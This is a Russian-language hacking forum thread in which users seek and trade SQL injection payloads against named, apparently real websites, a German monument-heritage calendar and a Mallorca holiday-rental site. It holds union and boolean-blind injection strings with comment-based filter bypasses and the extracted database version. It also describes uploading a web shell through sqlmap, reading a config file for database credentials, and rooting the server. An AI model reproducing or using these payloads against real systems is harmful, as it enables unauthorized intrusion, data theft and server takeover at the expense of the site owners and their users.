можно. Можно к примеру попробовать рутнуть сервер. $uname -a p.s. а если нету прав - поискать где есть. к примеру папки с аватарками.
PHP: $var = $_POST['value'];$var = addslashes( $var );$var = stripslashes($var);$var = str_replace( "<?", "<?", $var );$var = str_replace( "?>", "?>", $var );$var = mysqli_real_escape_string($var);############# v1.query( "UPDATE comment set text='$var');# v2.query( "INSERT INTO comment text='$var' WHERE id = '1'); Ребят, есть варианты провести инъекцию?
помогите вывод сделать, тайм бейс не крутит( Code: https://www.denkmalschutz.de/denkmale-erleben/terminkalender.html?tx_igcalendar_pi1[termin][eventSuche]=1&tx_igcalendar_pi1[state]=118)+union/**//**//**/select+1+--+
вывод через union мне добиться не удалось, но там boolen есть Code: 118)/**/AND/**/1=2+--+s' | grep 'event_417' 118)/**/AND/**/1=1+--+s' | grep 'event_417' <div class="event_417 event"> хм что интересно функции substring,mid,right,left по какой то причине на работают.. но нормально работает like, версия базы 5.6 Code: 118)/**/AND/**/version()*1+like+%275.6%%27+--+s' | grep 'event_417' <div class="event_417 event"> к information_schema тоже доступ есть Code: 118)/**/AND/**/(select+table_name+from+information_schema.tables+limit+1)+like+%27%%27+--+s' | grep 'event_417' <div class="event_417 event"> ещё там операция = не всегда работает, лучше юзать like скульмап по какой то причине в упор скулю не видит ----------- чорт, там запятая фильтруется -_-
Ну если честно, upload там спокойно льётся через sqlmap, но если потом через этот upload лить shell, то он не выполняется, ощущение такое как будто нет поддержки php :/
В общем, заливаю upload, через него заливаю шелл, открыв его сервер его не обрабатывает как php, а выводит просто текст с кодом. Хотя upload работает нормально. php
http://www.websec.ca/blog/view/Bypassing_WAFs_with_SQLMap Стоп, что-то я не понял... Есть иньжект, sqlmap раскрутил его, залил через mysql в файл.php код и код не исполняется? Ааа, понял, в папке, куда залит шелл нету прав... Попробуй прочитать конфиг.php. Там будет логин и пароль подключения к БД. ssh mysql@server
мимо, sqlmap не видит самую простую инъекцию and 1=1/and 1=2 впрочем даже если бы видел тамперы там не помогут, фильтруются запятые, плюс некоторые запросы чуть меняешь логику - не отрабатывают, там проще свой скрипт набросать
чё можно сделать? Code: http://www.mallorca-holiday-rentals.info/index.php?id=5&L=1&tx_fewo_mail%5Bobjref%5D=2604'
Code: http://www.mallorca-holiday-rentals.info/index.php?id=5&L=1&tx_fewo_mail%5Bobjref%5D=2604)+order+by+24+--+-
Code: union/**/select/**/*/**/from/**/(select/**/1)a/**/join/**/(select/**/2)b/**/join/**/(select/**/3)c/**/join/**/(select/**/4)d/**/join/**/(select/**/5)e/**/join/**/(select/**/6)f/**/join/**/(select/**/7)g/**/join/**/(select/**/8)h/**/join/**/(select/**/9)i/**/join/**/(select/**/10)j/**/join/**/(select/**/11)k/**/join/**/(select/**/12)kq/**/join/**/(select/**/13)kz/**/join/**/(select/**/14)kr/**/join/**/(select/**/15)kt/**/join/**/(select/**/16)ky/**/join/**/(select/**/17)ki/**/join/**/(select/**/18)kk/**/join/**/(select/**/19)ko/**/join/**/(select/**/20)ka/**/join/**/(select/**/21)kqq/**/join/**/(select/**/version())kee/**/join/**/(select/**/23)kaa/**/join/**/(select/**/24)kbbb+--+s 5.6.19-67.0-log
Если бы у меня было известное решение, то, наверное, я бы не спрашивал. В любом случае, спасибо за ответ.
ax*eть. Парни подскажите, если есть иньекция но сервер на генту и не возвращает никаких ошибок как действовать??
Вернее что бы не быть голословным вот реальный пример: ?id_list=359982' or 1=1 -- 'a --> вывод ?id_list=359982' or 1=2 -- 'a --> 404 ?id_list=359982' ORDER BY 1 -- 'a --> 404 ?id_list=359982' GROUP BY 1 -- 'a --> 404 Напомню что ошибки не отображаются. Эни айдиас?